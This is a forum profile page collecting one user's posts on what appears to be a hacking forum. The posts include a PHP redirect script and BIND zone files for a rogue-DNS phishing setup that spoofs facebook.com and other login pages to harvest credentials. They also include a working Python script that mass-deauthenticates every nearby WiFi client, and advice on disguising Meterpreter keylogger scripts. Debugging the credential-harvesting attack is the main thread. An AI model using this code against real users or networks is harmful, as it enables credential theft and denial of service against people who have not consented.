bobbyb1980

Everything posted by bobbyb1980

  1. Hey guys, having a small problem with redirect.php that's driving me insane. Probably nothing, but it's starting to eat up time.

         <?php
         $ref = $_SERVER['HTTP_REFERER'];
         if (strpos($ref, "facebook")) {
             header('Location: facebook.html');
         }
         if (strpos($ref, "twitter")) {
             header('Location: twitter.html');
         }
         if (strpos($ref, "hotmail")) {
             header('Location: Hotmail.htm');
         }
         if (strpos($ref, "live")) {
             header('Location: Hotmail.htm');
         }
         if (strpos($ref, "gmail")) {
             header('Location: Gmail.htm');
         }
         if (strpos($ref, "yahoo")) {
             header('Location: Yahoo.htm');
         }
         require('peets.html');
         ?>

     The problem is when I type "facebook.com" into my VM's browser it just hangs at "facebook.com/redirect.php" and nothing displays on the page. It seems that there is an issue in redirect.php but I can't seem to finger it. The victim machine is an XP SP2 box running Firefox 12. The victim is being redirected to this malicious site via an edited hosts file. The server has been tested and PHP5 is working; it's an Ubuntu Server running apache2 for the webserver.
  2. I can think of MITM-style tactics to trick someone into typing the password on a bogus router login page... but other than that this will be a toughie. How does the router store the password? Is it hashed? What OS is the router running? How is the ISP remotely resetting it?
  3. Hello fellow hackers. I am trying to broaden my horizons a little by testing out the RATTE and SE payloads but I can't get either of them to work. Before I invest too much time with them, I would like to know if you consider them better than Meterpreter. Is it worth learning these payloads and their ins and outs or should I just stick with Meterpreter?
  4. Cool whistlemaster. Never tried it using bash. This week I am going to start working on one that uses pylorcon to send the deauth packets so there is no dependency on aireplay-ng.
  5. I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P

         """
         This script is designed to deauthenticate all macs found in the air with the exception of whitelisted ones.
         Input known good client and AP and all other MACs on 2.4 ghz in the area are denied service.
         """

         import subprocess
         import time
         import sys
         import re
         import sys

         iface = 'mon0'

         # List of macs to deauth
         todeauth = []

         # Don't deauth
         mymac = ''
         myap = ''

         searchmac = re.compile(r'([a-fA-F0-9]{2}[:|\-]){5}[a-fA-F0-9]{2}')

         # Takes all macs from airodump-ng stderr and puts them into list
         def grabMacs():
             proc = subprocess.Popen(['airodump-ng', '%s' % iface], stdout = subprocess.PIPE, stderr = subprocess.PIPE, executable='/usr/sbin/airodump-ng')
             print('one second. im thinking...')
             time.sleep(10)
             for x in proc.stderr:
                 a = searchmac.search(x)
                 if a:
                     todeauth.append(x[a.start():a.end()])
                     print(x[a.start():a.end()])
                 elif len(todeauth) > 15:
                     break
                 sys.stdout.flush()

         # Takes all macs from airodump-ng output csv file and puts into list
         def snabMacs():
             subprocess.Popen(['airodump-ng', '-w', 'test1234-01.csv', iface], stderr = subprocess.PIPE)
             print('collecting MACs for 10 seconds...')
             time.sleep(10)
             file = open('test1234-01.csv-01.csv')
             for x in file:
                 a = searchmac.search(x)
                 if a:
                     print(x[a.start():a.end()])
                     todeauth.append(x[a.start():a.end()])

         # Deauth all targets in todeauth list from grabMacs or snabMacs
         # function. Will remove known good macs as mymac and myap input.
         def massDeauth(todeauth, mymac, myap):
             if myap in todeauth:
                 todeauth.remove(myap)
                 print('known good ap was successfully removed from deauth list')
             elif mymac in todeauth:
                 todeauth.remove(mymac)
                 print('known good mac was sucessfully removed from deauth list')
             elif len(todeauth) > 0:
                 print('starting deauths')
                 for x in todeauth:
                     proc = subprocess.Popen(['aireplay-ng', '-0','0','-a', x, iface], stdout = subprocess.PIPE, stderr = subprocess.PIPE)
                     print('deauthing...')
                     proc.terminate()

         snabMacs()
         time.sleep(3.5)
         massDeauth(todeauth, mymac, myap)
  6. www.giganews.com is probably the most reputable Usenet provider with the highest retention.
  7. My friends and I all use Usenet to download stuff. More reliable anyway. The ironic thing is while they're busy spending hundreds of millions trying to shut down torrents and block them at ISP levels, the exact same content is sitting on nearly every ISP's newsgroup servers worldwide (including US and UK), and even more there are dozens of companies selling long-term retention and high-speed access to it, and even more this has been happening since before torrents have even existed. And they go after torrents : P
  8. I don't like the idea of not knowing how to exploit OSX, the only reason I want to install it is to pwn it : )
  9. You're going to need to be a lot more specific in what it is you're trying to do. All I understand is that you're trying to attack a remote machine and something about port forwarding. Don't use db_autopwn either.
  10. Tried downloading the Fusion image but it wouldn't work for me. I'm running an Intel Core i7 (ASUS G53S). Anyone know how I can make this happen?
  11. Yes, Backtrack is based off of Ubuntu but they are quite different. For example, Backtrack does not have Flash installed by default. Backtrack also has several security settings that make everyday functions quite difficult. Just go with Ubuntu. If for whatever reason you two don't get along, then you can change, but Ubuntu is a very good starting place. I've been using Linux for about 2 years now and I still use Ubuntu as my day-to-day OS. Remember not to be afraid of Backtrack either; you can use it, we just wouldn't recommend it as an everyday thing. Don't forget to keep it simple : )
  12. I was reading this a few days ago... I love how the FBI issues their warnings. They said you shouldn't use wifi, but they proceeded to say that hotel wired networks are also dangerous. Well, I guess I'll just have to invent my own protocols before travelling! On a more serious note... how do you advise the average person about this? If I told my client to "verify software certificates before proceeding" they'd look at me like WTF. IMO that is not practical advice. I think the best thing to tell people would be that when they are connecting from any type of public network, wifi, wired, internet cafe, whatever, they're taking a certain risk, and to protect themselves against that risk is going to require some reading and due diligence.
  13. No problem digi, I appreciate the help that you and others have offered in this thread. I gotta say though, I am really learning to appreciate a nice, organized config file like apache and so many other servers offer : P I think this problem has something to do with reverse lookups. Going to try to delete the reverse lookup entries and hopefully when the browser can't resolve the IP to a domain (if browsers even do reverse lookups) it will just initiate communication with the server and proceed on. If that doesn't work, going to try to do what I was saying earlier and create another zone, like facebook.co.uk, specifically for being forwarded to after successful credential harvesting, and that zone would forward to a legit facebook IP that is not affiliated with traditional facebook.com IP, if it even exists. Then if that doesn't work, I'll just create a nice page that says "facebook is under construction" and cross my fingers that it doesn't make any clients suspicious, which it very well may. Especially if I do that with multiple sites.
  14. digi, I put 4.3.2.1 because I didn't want to put the address of my server; that's not the actual IP I am forwarding to nor do I own it. This really isn't bind syntax per se, it's C, so if any of you C'ers out there are reading please chime in! I'm really not following most of what you're saying digi, but I can conclude at the end of the day just about everything is going to forward to "facebook.com" or a subdomain of it, which in turn will bring it back to the credential harvester or a 404 error. I'm sure there's still a way to do it, heck, there are probably several ways to do it. I do have a question. Can you successfully do what I am trying to do using OpenDNS? Please type "Y" for yes or "N" for no : )
  15. Once again... I am doing this from over the internet. This is not an ARP-based attack, not on the LAN, so can't (to my knowledge) use stuff like SSLStrip or ettercap. The victim thinks that my rogue DNS server is their own. This is the DNS that they will live with for the time being. This same principle would apply to a pineapple-based rogue DNS attack, so heads up pineapplers! With that being said, here is the config I have. 1.2.3.4 = DNS Server and HTTP server w/ credential harvesting page

      named.conf.local

         zone "facebook.com" {
             type master;
             file "/etc/bind/zones/facebook.com.zone";
         };

         zone "4.3.2.in-addr.arpa" {
             type master;
             file "/etc/bind/zones/4.3.2.in-addr.arpa";
         };

      facebook.com.zone

         facebook.com. IN SOA ns1.facebook.com. admin.facebook.com. (
             2006071801
             28800
             3600
             604800
             38400 )
         facebook.com. IN NS ns1.facebook.com.
         facebook.com. IN MX 10 mta.facebook.com.
         www IN A 4.3.2.1
         login IN A REAL FACEBOOK IP HERE

      4.3.2.in-addr.arpa

         @ IN SOA ns1.facebook.com. admin.facebook.com. (
             2006071801 ; serial
             28800      ; refresh, seconds
             604800     ; retry, seconds
             604800     ; expire, seconds
             86400 )    ; minimum, seconds
         IN NS ns1.facebook.com.
         1 IN PTR facebook.com

     And named.conf.options is normal and forwards all requests for zones that are not local to the server to Google's DNS server. To recap, the attack works fine, I can harvest credentials fine, but when the user presses "login" they get a server not found error, which would raise red flags to a security-savvy target. The weird part is that even when I type the true facebook IP in the browser, nothing is happening; it's not going to the real page because the real page forwards requests to 10 million different subdomains of facebook.com. Anyone got any ideas? Thanks again for the help guys.
  16. Thanks for the reply, however I won't necessarily have access to the victim's machine to flush the DNS. Without going into a 5 page explanation, I'm using it for clients that I'm running pentests on, weak routers are commonplace, and in theory all I'd have to do is get them to go to a website, snag their IP, then remote into the router and change the DNS, then voilà. Remote access to the victim is obtainable (I could use a ms module to rickroll all sites to a java app page via a different style bogus DNS server, but that would be obvious). If I understand you correctly, I think that even if I could flush the victim's DNS that wouldn't work because the browser is going to ask for another DNS record from the DNS server, which would tell them the exact same thing (malicious site). Thanks for the help guys.
  17. How would I flush the DNS on the victim? The victim is assigned this malicious DNS server from over the internet. Digi, I'm not sure I understand your question, but I'll give it a shot anyway. Let's say I'm cloning gmail.com. Once the victim arrives at the credential harvesting site, after they enter credentials they are forwarded to mail.gmail.com or even login.gmail.com (for the sake of conversation). However this ALWAYS gives a "server not found" error. Same thing with facebook.com, it forwards to https://login.facebook.com. This is the odd part. Even if I type in the TRUE gmail.com IP into the browser, nothing happens. I've also added entries like this "login IN A TRUE_IP" into the zone file and it still can't work properly. Later on today I am going to try to add an entry in "named.conf.local" for a zone like "gmail.co.uk" and have it forward to a true gmail server (and presumably have the credential harvester forward to gmail.co.uk after the attack is complete), but I'm even skeptical about that... Any ideas? Thanks for the help guys.
  18. Hey Sorrow, I remember you mentioning that you code in Python. You should check out scrapy (scrapy.org). I think it has DB options, if not you should be able to pickle or shelve your findings for future referencing.
  19. Hello all. I've been doing a little experimenting for the past several weeks with bind9 and I am having some issues. I can successfully add zones and in theory have a functioning DNS server. However I am having a problem when it comes to redirects. Here is an example. I create an entry for "www.testmylogin.com" then I clone "www.testmylogin.com". When a user types "testmylogin.com" they are forwarded to the malicious site, where they then enter their credentials. However when the attack is over and it's time to redirect, "www.testmylogin.com" redirects to "login.testmylogin.com" which is actually a subdomain and therefore either forwards to the same IP or results in a 404 error. Is there any way to get around this, perhaps I can add an A record in testmylogin.com.zone? The problem is I am not a C programmer so the most I can do is guess with the conf files. I've tried adding the A record in the zone file, didn't work. Also tried playing around with the reverse DNS lookup file, didn't work either. I've read that there are several ways to do this, etc etc but I'm just looking for a way that works. It also looks like in theory to verify the integrity of DNS you'd need to have a known good list of IPs for servers you use which would be a pretty long list.
  20. Have you verified the integrity of your DNS server?
  21. On the mk2, you can change the BSSID in the X WRT interface. Don't have mine with me, but you could see whatever script the X WRT interface uses to change it and try to mimic that method and perhaps it will be applicable to the mk4.
  22. Excellent explanation digip.
  23. Read some tutorials on "the wifi pineapple." You can also take meterpreter scripts, and alter them so they look like something they're not. There are several modules for keylogging within the meterpreter dir of msf3. For the most part they're simple scripts that can be easily modified. Your question is pretty general, so a little difficult to specifically answer.
  24. You've gotten some good advice so far, but I'd like to add that you don't have to start in any particular place. Work on what interests you and what you're passionate about, without that curiosity and passion this stuff can turn into a chore!